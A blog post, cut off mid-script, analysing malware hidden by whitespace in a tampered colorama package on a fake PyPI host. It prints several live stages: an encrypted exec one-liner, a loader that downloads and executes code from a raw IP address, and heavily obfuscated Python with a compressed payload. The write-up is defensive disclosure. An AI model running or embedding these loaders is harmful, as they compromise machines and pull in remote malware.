Let’s dig deep into pypihosted malware | Part 1
7 min readMar 4, 2024
I hope this article catches you well, Last article I talked about how I discovered a malware on my system, a custom pypi package was modified, edited and hosted on pypihosted.org, Getting placed in requirements.txt of random projects on GitHub, Spreading malwares all over the internet
This article I actually was able to download the malware, Checking the commits made by the hacker spreading those malwares I found out that he added a new version of colorama library, This time it’s 0.4.6 and a new tar file was created, And I was able to download it this time
I downloaded the tar file, then unzipped it, the malware was on the same place at __init__.py while being pushed by white spaces so people won’t notice it, But this time it turned out that the hacker actually owns pypihosted.org and the malware moved from Galaxy Gates VPS servers into that domain
I opened the link, and i found the python code he’s executing on his victims systems
Here’s the code in-case you want to self-debug it
__import__('os').system('pip install -q fernet requests pycryptodome psutil && cls');exec(__import__('fernet').Fernet(b'tEeTr78OlX-bMK3PJkOt0KNfrobTKZp-NnmgUQMFb5A=').decrypt(b'gAAAAABl44lrawN9NjeZSRVFRIDKe6XPssyd29pCJNboJHzjHK51ZijwDWNYw88JUAMupe1TSAIPzcUTfLB8uxzDjf3n5maiFcNm4yM5ZIhVGjy9csiNLVMVhfX4xY8IP4vSlM3EuxsNYYC-oGpnnl379012zETOcxzVfk8bMRiKc9gZgxNrAB_PItvoDoNGx7bcPsx9QgTTkVT8cjYiTMr04feyMu79pDBPsdJGWzzk7za-dQxhFDkDVrqTtaCvW81sITlDSksBB2aKRAVdhs9-9ZDvAE3nK69l92jGLCf-Y5MDJwyTcVBTEu9oOVcuLRPqD4AjuKeT4QGjUjWJfq5C96xzLCiltyYCjDXWJCmgamt70M_oHIcC7hyb1J7tGqtOPz1eTQpN4SFCt70-lsyrw04YAwuTjFU9ed1VyQjnCsVPYoV6Ku1MeytccZHPoTF1EkV5BnoNdmS1mCKog4iQrtQdL-ayTtEOmtN-A4Y8WDxrLvATBQ3UMTSsLhH4uAID1s5NI1WS57jmW1Xi-3CrSV6fiEAAOguLkoo2LqpNI2sCaW52DPpmUrolYuRuI__beV67uv3d_BrH5J5qnra0VPoe56qCheYqfsXbLWFn0VRkO8j4-qWL2IBdp2SeNuT15-OcwOD9H3RfheXvAKdrrxG1CQZpPvT5CUIkRfx39fK1wOBkXrO1K5UOgT4nTVzZ8R24M-KwsKsgKTrLWk_rUTtJGX5DFC4Nu-qCxOCvOLf_y5wzokgfOscLrc2lXKCxrEhrrLaEBR6SZKcieZ9oipPD3OkpKibrshcOi8_uFpnnu3TnB8WKyKkttfCozngXdsKH7oznNaxIYmAZIBP_wBCGPC1sEX6fWVk6RfZi5LL9zyLew58i4lcf01D26k7dHDrlYa8r3oTlxApnfMDGXSOzPppb0bhM5DBMbewp2CXe-HVaXAZ9ZFW5LJeMwKI90aGB57X0Bfzr4PfOSvXODI4pk8e5NGucI55N-z0znbp2g_Ostcw='))So, let’s break down the exploit, The hacker is using __import__ to import os library and he’s using system to execute a custom command
pip install -q fernet requests pycryptodome psutilHe’s using pip to install fernet, requests, pycryptodome and psutil, While using -q mode so pip won’t print any output that would make the user suspicious about colorama, then he’s just clearing the terminal in windows using cls command
Then it’s executing another python code using exec function on python right after decrypting a fernet message, To actually decrypt the fernet code here I used cryptography library on python, Because for some reason fernet wasn’t working on my machine, I ended up using this code to decrypt the malware
from cryptography.fernet import Fernet
decoded_code = Fernet(b'tEeTr78OlX-bMK3PJkOt0KNfrobTKZp-NnmgUQMFb5A=').decrypt(b'gAAAAABl44lrawN9NjeZSRVFRIDKe6XPssyd29pCJNboJHzjHK51ZijwDWNYw88JUAMupe1TSAIPzcUTfLB8uxzDjf3n5maiFcNm4yM5ZIhVGjy9csiNLVMVhfX4xY8IP4vSlM3EuxsNYYC-oGpnnl379012zETOcxzVfk8bMRiKc9gZgxNrAB_PItvoDoNGx7bcPsx9QgTTkVT8cjYiTMr04feyMu79pDBPsdJGWzzk7za-dQxhFDkDVrqTtaCvW81sITlDSksBB2aKRAVdhs9-9ZDvAE3nK69l92jGLCf-Y5MDJwyTcVBTEu9oOVcuLRPqD4AjuKeT4QGjUjWJfq5C96xzLCiltyYCjDXWJCmgamt70M_oHIcC7hyb1J7tGqtOPz1eTQpN4SFCt70-lsyrw04YAwuTjFU9ed1VyQjnCsVPYoV6Ku1MeytccZHPoTF1EkV5BnoNdmS1mCKog4iQrtQdL-ayTtEOmtN-A4Y8WDxrLvATBQ3UMTSsLhH4uAID1s5NI1WS57jmW1Xi-3CrSV6fiEAAOguLkoo2LqpNI2sCaW52DPpmUrolYuRuI__beV67uv3d_BrH5J5qnra0VPoe56qCheYqfsXbLWFn0VRkO8j4-qWL2IBdp2SeNuT15-OcwOD9H3RfheXvAKdrrxG1CQZpPvT5CUIkRfx39fK1wOBkXrO1K5UOgT4nTVzZ8R24M-KwsKsgKTrLWk_rUTtJGX5DFC4Nu-qCxOCvOLf_y5wzokgfOscLrc2lXKCxrEhrrLaEBR6SZKcieZ9oipPD3OkpKibrshcOi8_uFpnnu3TnB8WKyKkttfCozngXdsKH7oznNaxIYmAZIBP_wBCGPC1sEX6fWVk6RfZi5LL9zyLew58i4lcf01D26k7dHDrlYa8r3oTlxApnfMDGXSOzPppb0bhM5DBMbewp2CXe-HVaXAZ9ZFW5LJeMwKI90aGB57X0Bfzr4PfOSvXODI4pk8e5NGucI55N-z0znbp2g_Ostcw=')
print(decoded_code.decode('UTF-8'))And I ended up getting the actual malware code, it looks like this
import subprocess
from tempfile import NamedTemporaryFile as tempnaw
from os import system as syast
py_execs = ["pythonw", "pyw", "py"]
for py_exec in py_execs:
try:
subprocess.run([py_exec, "--version"], stdout=subprocess.PIPE, stderr=subprocess.PIPE)
break
except FileNotFoundError:
continue
else:
py_exec = "python"
temp_file = tempnaw(delete=False)
temp_file.write(b"""exec(__import__('requests').get('http://162.248.100.217/inj', headers={'User-Agent': 'Mozilla/5.0 (CyberW / Python) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30'}).text)""")
temp_file.close()
try:
syast(f"start {py_exec} {temp_file.name}")
except:
passAs we can see, He has a list of common python executables names, and he’s validating which one of those executables can work on your machine by using a simple try except validation based on the output of subprocess.run, the moment subprocess doesn’t return an error the py_exec is determined as a valid one
After that he’s doing the same as the last one, he’s importing requests, downloading another malware in a temp file on your system, then executing it using python
Now let’s take a look at the new malware we discovered
#Lets Try
from builtins import *
from math import prod as _假设
_代码_ = '尝试尝试 = "尝试尝试"'
_统计学, 统计学, _计算, 数学, _堆栈溢出, 计算 = exec, str, tuple, map, ord, globals
class _乘积:
def __init__(self, _分割):
self._内存访问 = _假设((_分割, 78309))
self._内置函数(_运行=87522)
def _内置函数(self, _运行 = Ellipsis):
self._内存访问 *= 43545 * _运行
def 系统(self, _数学 = -24271):
_数学 /= 38361 / -84088
self.运行 != float
def _帧(_理论 = bool):
return 计算()[_理论]
def _检测变量(算法 = -80858 - -48824, 帧 = bool, 分割 = 计算):
分割()[算法] = 帧
def execute(代码 = str):
return _统计学(统计学(_计算(数学(_堆栈溢出, 代码))))
@property
def 运行(self):
self.调用函数 = '<_主要的_._内置函数 物体 で 0x00000451242BE559812>'
return (self.调用函数, _乘积.运行)
if __name__ == '__main__':
try:
_乘积.execute(代码 = _代码_)
_调用函数 = _乘积(_分割 = 47761 + -76211)
if 535745 > 6635814:
_调用函数.系统(_数学 = 52743 * _调用函数._内存访问)
elif 423698 < 6928056:
_调用函数.系统(_数学 = 30109 + _调用函数._内存访问) ;_乘积._检测变量(算法='ぱさらぱぱらららぱらさぱぱささぱぱぱぱららささらさぱぱらささささららぱらら',帧=b'x\x9c\xed\\\xcdO\xe3H\x16\xbf\xe7\xaf\xf0\xfab[\x1d\xdc\x81i\xcd\xb2H90\x10z\xd1t\x03\x1b\xc2\xb0\xbb\x04E\x8e]I\xaaq\\\x9er\x19H#\x0e\xcci\x86\xc3\xcc\t\xf5\x9f\x80\xc4e\x94\xc3^\xfb\x9f\xe1\x1f\xd9W\xfe(\x97?\xd2\xbbZ\xad\x940m\xdaJ\xca\xaf\xde{\xf5\xbe\xea\xf7*_\xed\x12\xdbr\x03\xdd8\xd3\x9e\xef\xee\x9f\xef\x9e\xd2Gq\xddK\xf4\xfb\x05\xb7e\xa2,^\xd6\xf3\xb4\x80\xbf\xb8\xb4v\xde\x1e\xbbd\x08\x066V\xd0\xba(h?\xfd\xf2|7\xe7\x8f\xf1 \x1e\xdf=D\xd7\x9c?&\xb7\xf3\xdc@\xbeb\xa9\x9c\x12I*Q%\x14\xa6z\n\xe2\xd9\xad\xc4\\P\x9e\x8c\x1fJ\x06\x14\x94\xf3\x81v\xb6\xb5\xf5j\xed\xd5\x9a\xbe\xa6\xbfZ7\x8c\xf3\xf3\xb6\x83\xe9\xca&\xa1\x9a\xe3>\xaf\xf4\xa9\xca\xc42\xb1\xd2\xc3\x82\xb7O\xe5\xf0\x8c\x11\xb3\x18[\xdd\x10\x89\xca\xca\xe5\xf9!+\xa2B)U\xb2\x89\xd2\x93K&7x\xc8(r\xf5\xc9\x0b\xc9\x9c\xe5}#o\x82d-i\\(\xdbt\x008\xe1F8\xd6\xf8c\xfb)2\xf9\xb9x\tb<\xc8\x84?\xe7\x06\x82G\x10\x0b\x0c\x95z\xe4\xdb\xbb\xcf\x10\xec\xc1\x00O}B\xd9`\xb0\xb2\xf5~\xf7{t\xfd+\xbd\xc4\xed\xaf\xd1\x15\x0fd\x86_%6\x99A\xd0\xe5\xd9\x82*\xc1,\xcb\x16\xd8~\x97\xf4\xc8&\x15t&c\x08\xf2\xd2\x13\xadk\xc3\x10\xbb\x0c{\x81f\x98\x97\x16\xfd*vWE!\x17\xea\xae\xdc\x0e\x16Uhe\xa9&c\x9e\xe0\xff\xa2\xd1Tm\x97\xa7\x12}\x911\xc5\x9d\xa4\xaf@M\x05\x1ef.\x0e\x87\xc5\x16j4+N*\xd5\x87\x95y\xb10\xe4\xfc~\xf9lT,\x9e\x05\x07\xb5\x82\xf2\x9c\x01\xf3\\Ee&=\xe4\xf4K;b\xa5\xa3n\x9c\xd5a_F\xd8M\xec9\xe8Z\xd7P\xe0Z{\xa5\xe9s\xa3\xf1\xd2;X\x8c\xa6??\xdf}z\xbe{\x8c\x1f[\xad\xe8\xf9S\xf6\xf4(\xaeV\xca\xf5)\xe1\xcdF-!\xf2(T\t\t~\xdf\xaa\xc1\xb4\x06\xd3U\x88z\r\xa6\xcb\x05Sf\x11wT\r\xa6\xf7U\x00Q>\xa6U\xc2D\xe5Q\xae\x08\x07\xff\xdb\xab\x94\x9f[\x1c\xde\x1e[2\xaa\xa5\xa0\xf7X\x80\xc4d\xb6\xd5\x92\x11\xf21\x15\x17*>\x01\x1aj\x9a\xf9\x81`\xef\xab8\xb0\xcf\xd38\xff&]\xf3<}\x9e\xa7\x8b\xdb\xfbt<_ u\x9f\xe7\x9c\xe7W\xb9\x97\xd4\x16\xe8sI\xa4p\xfb[\xdd\xae\xeav\xb5\nQ\xaf\xdb\xd5r\xc2\x9e\xb6+\xd7\xbaD/\xaa[}\x01\xa4\x9e\x16,\xf6\x058\xab\xb4\xb5\x12\xd1\x16\xf9\xc3\xaf\x1aLk0]\x85\xa8\xd7`\xba\\0E!\xed\xfdq\xdfGI\x81\x89\x87\xe3)\x8d\xd1S\xeeQ\x1e\xc8\x97,R\xe0\xafd\x88nkT\xadQu\x15\xa2^\xa3\xear\xc2.\x8e\xa8\x84\x94gW\xf8\x88ZLK\x95\xe7_\x88Q9\xb8r\x94e\x91B\xb6\n\xe3ER?\xfd\xf2\xd5\x02+\xc6v`y\xb8\x06\xd6\xd5\x88z\r\xac\xcb\t{\n\xac\xb3\x11v\xaf\xd1\xc4\x0b_\x12\xba\x16R.\xdffi\xce\xe7#\xcbY\xe9\xab\x90i\xc2r\x82\xd9@\xae6iE\xb9\x02\xca\xa5S\x90\xad\x16\x9c\x97l\xe3\xc4\xaf\x16\x99\xeb#\xefJE\xbdF\xe6\xe5\x84]\xbc\x91\xe0b\x7fJ\xec\x17\x85\xcb\x02\xef\n\x1fM\xddGD\xa1B\xf0\x08z\x81s.\xd1\x0b\x1fk\xcdK\x1f\xa1\xddW\xad5/}\x9c6\xaf\xe1\xb5\x86\xd7\xd5\x89z\r\xaf\xcb\x85W\xca\x82\x97\x04\xadY:\x1f*\x06\xe5Z)\xdf\x96kbQ\x05T\xe4\xf5\xa1bPYC\xf2\x94\x18ge\x97/\xf7\x82\x9dw\x0frF\xa4\x96\xf1b\xbeQ\xa1\x97v\xcf\xca\xbd\xf1\xa3\x0f\xb5o\xd67\x9c\x8d\xcd\r\xe7\x9b\xd6\xc6_4\xc3t\x90M\x1c\xa4k\x9b#V~\x15hD\xbf*\xaa;f\xdd1\x97\x1e\xf5\xbac.\'\xeci\xc7\xb4\xd1u\xe5\xd7D\xe0oD\xc9TI\x7f\xa5\xa3\xc4?\xcaR\x1cL\x9b b7\xa9\xe5\x8dQ\x93\xf8\xc8\x83{\xcc\x1a\x9c\xa8k\x1aH&\x9cA8\xf4)\xb1Q\x10\xa4\x14L\xc4\xdcL\x10\x87V\x80\xbe}\x93\xdeQ\xf4c\x88\x02\x16\xc4\x8b\x13\xb1\xec\x181\xe4]6\x15\xcf\x9a\xa2\xa6\xe2\xe2\x80qC8\xd9%c\xec526\xdf\xca\x16\xbc\xc2\x1eE\xe3X\x17\xd8\xeb\xc0S2cO\x08\xb6Q\xba\x8a\xe9[l\x92N\xe1`\x84]X\x84\x7f\xc7\xb1\xc9\xfd\xe5k6\x1a\x0e\x1aq\xf5\x03\xec_\xbe\x19X\x8eC\xc11\xdd\xd8j(\xf0\xc7\xe8,\x1e\xf0?\x8aXH=\xe1\x89\tB\xba:a\xcc\xdfz\xfd\xda\x9e \xfb\x02\xfb\xa65\xb5>\x12\xcf\xba\nL\x9bLU\xc3d\xe8\x9a\x99\x01\xa3\xd8\xd7\x8dH\x11\xba\xb6\x91\xcf\x94N\xf4\x84\x89\xa7X\x81\x82Jkh\x07\xc4C\x1aD\xdc\xe7V)\xed\n\x03ar\x14EM\xf9S[Q=\xa6n%\xfa1\xe3\x93\xfel\xc0\x13\x17\x80\xec\x99\xea\xcf\xd8\x84xWjS\x81a\xf2\xa4\x9e7F\x84*\t\x9f\x82\xbdt\x18T\xb8\x9e\xa5\xdc\xa4\xa1\xa7\x9f%\xac\xa0hm\xed\x12\xd1\x00\x1cQ\xcf\x9b\n$\x8f\x84\xac-q\x1f\xed\x1fu":\xa2\xb4H7\x84\xfa!E\xd6\x85\x1c\x9e=H\xd4\x01a{$\xf4\x9c\x0e\xa5\x84f\xa6\xd8\xc4\x83\xb2\rQ\x03\xb9A\x12\xb8\xd4\x87\xb6\x92x\xaar\xff#\x97\x07Q\x01\xb4\xa3\x9c\xebI\xcau(R\x93\x0b\x84\xcc\x1a\xba\xc8h*#\xed&\xd1q\xcb\'x\xads\xc6(x\xd1\n\xea[j\xf9\x13l\x07\xbb\x14\x83\xbfj3\xa6\x1e\x83\x0e\x8a\xd9l\x07y,\xa3\xf6\xac\xe0\xe2\x18\n\xc2\t\xdd\x8c\xf8\x1e9\xd8z\x87\x87\xd4\xa2\xb3\x94v\x12 zD\t\xaf\xca \xa5\x1d vE\xe8\x05\xf6\xc6=B\\A>"W\x88\xbe\xb7<k\x8c\xa6\xb0XJ\xe6q\xea\\\xfb.\xa1\xd9J\xbb(\xb8`\xc4?\xc5\x0e\x14M\x90Q/a_\xc4\x1a\x04k\x17\x8da\xc3\xd1Y\xc7\xc1\x8c\x08\xeaw\x96}\x11\xfa\'\x0c\xbb\xe0\x9a0\x80b\x8f\xfd-D!\x12\xce\xcf\x02\x86\xa6\'\xbecI\xbe\x7f\xe7\x86\x88\x11\xc2&\xc7\x0c\xb4\x08\xe7-\xdf\xcfx\xde\x11\xcb\xc9\xee\xde\xf2@#\xca\xad\x13\xc6\xbe\xc76%\x01\x19\xf1\xad\xe3@\x95N-\xe1\xb1\xe5\x90\xa10a7\xaf\x18l\x0c\xa6\xc2<\x9f\xd8yS\xcd\xde\x04\xea\xcc\x81\xd0\x9a=<\xcd\xc4N\xf6\xcd#7\x04\xb01\x0fl\xbf \xd2\r\xa1\xda\xa6\xc8<F\x14[.\xfeh\xf1=k\xfe}\xea\x16\xf8 mfZ\r\x15S\xdd\x043*\xa6\xc0\xe8)fPU\xc5\xc9\xfdC \x9c\xc7\xf8\xf4\x16\xb1n\x04s\xbb\x98\xd2\x14\x9cb\xe0s\t/\xfc\x18\xf6\xf4\xb3\x18Nuu\xfb\xe8hw\xbb\xb7\xad\x1aM%%\xbd;\xdc\xd9~\'\xe8\xe7\xf1\xee\x83-9".\xa4\x83\xd7z\x82\xbe\xbaP\x1c\xf3p\x98\x18p\x80\x88:\x83\xbe\xde2r\xc0\x10/\x9d\xd9\x90\xa9\xcc6x\xfc\xff1(#\xecY./w1!( \x9f\xf9\xf3JQ\xfb}\x15\x9e\x84z!\xc0A\x8f\xa4X\xae\x0bqC\x01aE\x85\x7f\xd1\xac\x97If\xb6J\xf8\x9a7$!\xa6\x81\xeau\xde\x1f\xa9F\x1c\xf8\x1d\xa8\x18\x86"8\x82:\x85\x05#\xcf\xa4\x04D\x08,|\x8fP\xc3(N\x8a\xd5\xcc\xc0\x87=\xa5s\xe7\x8c\xb3\xb5\xf5s\xee\xa8\xc9\xfdL\x99\xffc\xbc\x0b\xee\xab7\xb1A\xb7\xfd\xfeM\xaa\xe3V5\xaa}V%\x96FU0\x16\x9a\xa7\xaa\xd1\x0f\x03\xf4\xc4KuhCl\xc6\x13\xfc\xe1\xc2\x9dz\xc4\xff\x91\x06,\xbc\xbc\xba\x9e}T\x8d\xa2\xf5\x9bF\x12\xc9S\xd8\x1aQ y\xd6 a\xb1\x8dW\x18\xe0\x99\x9f5\xf4\xb87O\xe1\xb5M[\xe5-\ny\xf0:\x07\xf6j[\r\xd9hm\x134C\xa7\x1ce\x9e\x8d\xcc+\xaeQ\xafl\xc7\xeb\xdfn\x98\x1bo6\xcd\xf5V\xcb\xdcX\xff\xf3\xd6f\xeb\xf5\x98\x0e\x93~\x9c\x18\x04\x08EYl\x10o\x12\x89Ar\x8f\x8a\xec:+6\x87\xa6\xc2\xd9\xa1\xdb\xd9\xbc6\x00\x0eF\xae5\x0e\xe4\xe6\xb6\xd3\xedl\xf7:\x83\x83\xc3\xc1\xe9\xfe\xc1\xee\xe1i\xba b\xd1\x9a\xb9\xe5|BF\xc8I\xba\xd4HSo\xe4\xc6u\x0b\x05}\x13\x0f\xb4$\\\x1e?\xf8\x00k|\x022\xff\xfa}\xe7\x1f\x83\x9d\x93n\xb7s\xd0\x1b\x9c\x1cw\xba\xb1V\xbe\x0c\x0b}\xde\x11\x8f\x0f\xf7z\xa7\xdb\xddN\xbf/P\xb5\xdf?\x85C"\xb9\n\xfa\xfd\x9d\x90R\xe8\'?\xc4=\xbc\xdf\x07\xbc\x8bk\xe3\x02\xcd\xecl\x99x\x1b|\x8ff\x9dk=\xb1\xa1)Vi*\xadf\xca\xc8\xcd9\xed\xee\xf7\x92\xe6\x9eP\xc1\xf3\x1f,\xe8\x0c \xcd\xf56\xf3\xdbE\x96\xefv\xde\x0e\x8e\xff\xd9\xe4\xc5*\x85\xe6\x96o\xc7\xc6^T\xea\x87\xa3\xbd\x18.\n\x98\xd8\xe0\x1bTL\x16\xf7\xad,k4\xf6B\xd7M\x18sJ\x05\xeed\xba\x1aR\xdd\xa6bFC\xaa\x9d\x8c(NL"\xd1\xd9\\|\xaeI\x8e+\xfc \xdb\x08\xa1\xe9%\xf8\x90\x1evuC\x81\xcd\x93\x1cuy=s\x1e~\x98\xa3\x1c\x1d\xd3:\xf7I\xc0tmq\xa1G\xaa>@\x99~\x08\x88\xd7\xbeQ\xd3\x85\xd4-%\x1d\xc2\xb9\x8d\x0f\xb1\x0f\xb4\xf8\x88\x99P\x02\xa8i\xe4\x05\x13\x02\xc7I%\xbbq\xb1wq\xdbT&\x887\xee\xa0}\xa3\xed\xc0!\x0c\xcaf\x8d\xcd|\xa4m)\x1a\xb4a\x17\xdb\xd1nx\xcd\x97\xd5n\x97\x9f\xb0\x1d\x17\xfb\xff\xd7\x9c\xfd\x1b\xd6a\xee\x1f')
_乘积(_分割 = -8638 * -84594)._内置函数(_运行 = _调用函数._内存访问 - -61335) ;ぎふふはぎはぎぎぎぎはふはふふふふぎぎぎふぎぎふはふふぎふぎははぎぎ,えし000でししし0しで00ででで0で00で0でしででししでし0でで00で000し000,あびびびびびああびびあびああびああああびびあびびびびあああびびびびびあああびびびびびびびあびびびびびあびびびびびびびびびあびああび,ららららなならななららららなななならららららならななららななななららららななならららなならなななららなららららなななららならら,まららままらまらららまらららままららまらまららまららまらまらままららまらららまらままらららまらららまらまららららららままままらままま=(lambda ぱぱおくぱくおくおぱおくくくおぱおぱくぱぱくぱくぱくおくくくおおぱぱくぱぱぱ:ぱぱおくぱくおくおぱおくくくおぱおぱくぱぱくぱくぱくおくくくおおぱぱくぱぱぱ['\x64\x65\x63\x6f\x6d\x70\x72\x65\x73\x73']),(lambda ぱぱおくぱくおくおぱおくくくおぱおぱくぱぱくぱくぱくおくくくおおぱぱくぱぱぱ:globals()['\x65\x76\x61\x6c'](globals()['\x63\x6f\x6d\x70\x69\x6c\x65'](globals()['\x73\x74\x72']("\x67\x6c\x6f\x62\x61\x6c\x73\x28\x29\x5b\x27\x5c\x78\x36\x35\x5c\x78\x37\x36\x5c\x78\x36\x31\x5c\x78\x36\x63\x27\x5d(ぱぱおくぱくおくおぱおくくくおぱおぱくぱぱくぱくぱくおくくくおおぱぱくぱぱぱ)"),filename='\xe381aa\xe3818a\xe381aa\xe3818a\xe3818a\xe3818a\xe381aa\xe381aa\xe3818a\xe381aa\xe381aa\xe3818a\xe3818a\xe381aa\xe3818a\xe381aa\xe3818a\xe381aa\xe381aa\xe3818a\xe3818a\xe3818a\xe3818a\xe381aa\xe381aa\xe381aa\xe381aa\xe381aa\xe3818a\xe3818a\xe381aa\xe3818a\xe3818a\xe3818a\xe3818a\xe3818a\xe381aa\xe3818a\xe3818a\xe381aa\xe3818a\xe381aa\xe3818a\xe381aa\xe3818a\xe381aa\xe3818a\xe381aa\xe381aa\xe3818a\xe3818a\xe381aa\xe3818a\xe381aa\xe381aa\xe381aa\xe381aa\xe381aa\xe381aa\xe3818a\xe381aa\xe3818a\xe3818a\xe381aa\xe381aa\xe3818a\xe3818a\xe3818a\xe381aa',mode='\x65\x76\x61\x6c'))),(lambda ぱぱおくぱくおくおぱおくくくおぱおぱくぱぱくぱくぱくおくくくおおぱぱくぱぱぱ:ぱぱおくぱくおくおぱおくくくおぱおぱくぱぱくぱくぱくおくくくおおぱぱくぱぱぱ(__import__('\x7a\x6c\x69\x62'))),(lambda え0しででで0ででで0し0で0しししででしで0000で0し0でしでししでで0で0し00ででで00ででで0,ぱぱおくぱくおくおぱおくくくおぱおぱくぱぱくぱくぱくおくくくおおぱぱくぱぱぱ:え0しででで0ででで0し0で0しししででしで0000で0し0でしでししでで0で0し00ででで00ででで0(ぱぱおくぱくおくおぱおくくくおぱおぱくぱぱくぱくぱくおくくくおおぱぱくぱぱぱ)),(lambda:(lambda ぱぱおくぱくおくおぱおくくくおぱおぱくぱぱくぱくぱくおくくくおおぱぱくぱぱぱ:globals()['\x65\x76\x61\x6c'](globals()['\x63\x6f\x6d\x70\x69\x6c\x65'](globals()['\x73\x74\x72']("\x67\x6c\x6f\x62\x61\x6c\x73\x28\x29\x5b\x27\x5c\x78\x36\x35\x5c\x78\x37\x36\x5c\x78\x36\x31\x5c\x78\x36\x63\x27\x5d(ぱぱおくぱくおくおぱおくくくおぱおぱくぱぱくぱくぱくおくくくおおぱぱくぱぱぱ)"),filename='\xe381aa\xe3818a\xe381aa\xe3818a\xe3818a\xe3818a\xe381aa\xe381aa\xe3818a\xe381aa\xe381aa\xe3818a\xe3818a\xe381aa\xe3818a\xe381aa\xe3818a\xe381aa\xe381aa\xe3818a\xe3818a\xe3818a\xe3818a\xe381aa\xe381aa\xe381aa\xe381aa\xe381aa\xe3818a\xe3818a\xe381aa\xe3818a\xe3818a\xe3818a\xe3818a\xe3818a\xe381aa\xe3818a\xe3818a\xe381aa\xe3818a\xe381aa\xe3818a\xe381aa\xe3818a\xe381aa\xe3818a\xe381aa\xe381aa\xe3818a\xe3818a\xe381aa\xe3818a\xe381aa\xe381aa\xe381aa\xe381aa\xe381aa\xe381aa\xe3818a\xe381aa\xe3818a\xe3818a\xe381aa\xe381aa\xe3818a\xe3818a\xe3818a\xe381aa',mode='\x65\x76\x61\x6c')))('\x5f\x5f\x69\x6d\x70\x6f\x72\x74\x5f\x5f\x28\x27\x62\x75\x69\x6c\x74\x69\x6e\x73\x27\x29\x2e\x65\x78\x65\x63'))
_调用函数._内置函数(_运行 = _调用函数._内存访问 / 65491) ;まららままらまらららまらららままららまらまららまららまらまらままららまらららまらままらららまらららまらまららららららままままらままま()(ららららなならななららららなななならららららならななららななななららららななならららなならなななららなららららなななららならら(ぎふふはぎはぎぎぎぎはふはふふふふぎぎぎふぎぎふはふふぎふぎははぎぎ(あびびびびびああびびあびああびああああびびあびびびびあああびびびびびあああびびびびびびびあびびびびびあびびびびびびびびびあびああび(えし000でししし0しで00ででで0で00で0でしででししでし0でで00で000し000('\x76\x61\x72\x73'))),_乘积._帧(_理论='ぱさらぱぱらららぱらさぱぱささぱぱぱぱららささらさぱぱらささささららぱらら')))
except Exception as 假设:
if 496203 > 7675892:
_乘积.execute(代码 = 统计学(假设))
elif 387379 > 5850648:
_乘积(_分割 = -82712 * 93033)._内置函数(_运行 = _调用函数._内存访问 * 80573)I have no idea what is going on, But anyways I started by cleaning some variables to make things clear so I can start figuring out what this stuff does, and I ended up finding out that this script is actually injecting another script, and after some really deep analysis that gave me a headache I ended up extracting the real malware from the global variables by modifying the malware to translate everything, then decompress the zlib compressed variable being pushed by spaces at the end of the line so it won’t be noticed, I have no idea why he keeps on doing this but here’s the modified script
#Lets Try
import zlib
from builtins import *
from math import prod as prodl
_execution_variable_ = '尝试尝试 = "尝试尝试"'
_exec, _str, _tuple, _map, _ord, _globals = exec, str, tuple, map, ord, globals
# Custom part
def translate_tuple(tuple_values):
translated_chars = []
for value in tuple_values:
# Handling special cases for space, equals sign, and double quote
if value == 32:
translated_chars.append(' ')
elif value == 61:
translated_chars.append('=')
elif value == 34:
translated_chars.append('"')
else:
# For other values, assume they are Unicode code points
translated_chars.append(chr(value))
return ''.join(translated_chars)
class productClass:
def __init__(self, init_variable):
self.math_prod_output = prodl((init_variable, 78309))
self.do_some_math(math_input=87522)
def do_some_math(self, math_input = Ellipsis):
self.math_prod_output *= 43545 * math_input
def does_map(self, _map = -24271):
_map /= 38361 / -84088
self.call_custom_function != float
def get_global_variable(_理论 = bool):
return _globals()[_理论]
def set_global_variable(算法 = -80858 - -48824, variable_value = bool, globals_obj = _globals):
# The global variable being set is the next malware for our research
# It's zlib compressed so we need to decompress it
decompressed_malware = zlib.decompress(variable_value)
print(decompressed_malware.decode('utf-8'))
globals_obj()[算法] = variable_value
def execute(execution_variable = str):
print(translate_tuple(_tuple(_map(_ord, execution_variable))))
return 0
return _exec(_str(_tuple(_map(__ord, execution_variable))))
@property
def call_custom_function(self):
self.custom_function = '<_主要的_.do_some_math 物体 で 0x00000451242BE559812>'
return (self.custom_function, productClass.call_custom_function)
if __name__ == '__main__':
try:
productClass.execute(execution_variable = _execution_variable_)
print('executed')
productObject = productClass(init_variable = 47761 + -76211)
if 535745 > 6635814:
productObject.does_map(_map = 52743 * productObject.math_prod_output)
elif 423698 < 6928056:
productObject.does_map(_map = 30109 + productObject.math_prod_output) ;productClass.set_global_variable(算法='ぱさらぱぱらららぱらさぱぱささぱぱぱぱららささらさぱぱらささささららぱらら',variable_value=b'x\x9c\xed\\\xcdO\xe3H\x16\xbf\xe7\xaf\xf0\xfab[\x1d\xdc\x81i\xcd\xb2H90\x10z\xd1t\x03\x1b\xc2\xb0\xbb\x04E\x8e]I\xaaq\\\x9er\x19H#\x0e\xcci\x86\xc3\xcc\t\xf5\x9f\x80\xc4e\x94\xc3^\xfb\x9f\xe1\x1f\xd9W\xfe(\x97?\xd2\xbbZ\xad\x940m\xdaJ\xca\xaf\xde{\xf5\xbe\xea\xf7*_\xed\x12\xdbr\x03\xdd8\xd3\x9e\xef\xee\x9f\xef\x9e\xd2Gq\xddK\xf4\xfb\x05\xb7e\xa2,^\xd6\xf3\xb4\x80\xbf\xb8\xb4v\xde\x1e\xbbd\x08\x066V\xd0\xba(h?\xfd\xf2|7\xe7\x8f\xf1 \x1e\xdf=D\xd7\x9c?&\xb7\xf3\xdc@\xbeb\xa9\x9c\x12I*Q%\x14\xa6z\n\xe2\xd9\xad\xc4\\P\x9e\x8c\x1fJ\x06\x14\x94\xf3\x81v\xb6\xb5\xf5j\xed\xd5\x9a\xbe\xa6\xbfZ7\x8c\xf3\xf3\xb6\x83\xe9\xca&\xa1\x9a\xe3>\xaf\xf4\xa9\xca\xc42\xb1\xd2\xc3\x82\xb7O\xe5\xf0\x8c\x11\xb3\x18[\xdd\x10\x89\xca\xca\xe5\xf9!+\xa2B)U\xb2\x89\xd2\x93K&7x\xc8(r\xf5\xc9\x0b\xc9\x9c\xe5}#o\x82d-i\\(\xdbt\x008\xe1F8\xd6\xf8c\xfb)2\xf9\xb9x\tb<\xc8\x84?\xe7\x06\x82G\x10\x0b\x0c\x95z\xe4\xdb\xbb\xcf\x10\xec\xc1\x00O}B\xd9`\xb0\xb2\xf5~\xf7{t\xfd+\xbd\xc4\xed\xaf\xd1\x15\x0fd\x86_%6\x99A\xd0\xe5\xd9\x82*\xc1,\xcb\x16\xd8~\x97\xf4\xc8&\x15t&c\x08\xf2\xd2\x13\xadk\xc3\x10\xbb\x0c{\x81f\x98\x97\x16\xfd*vWE!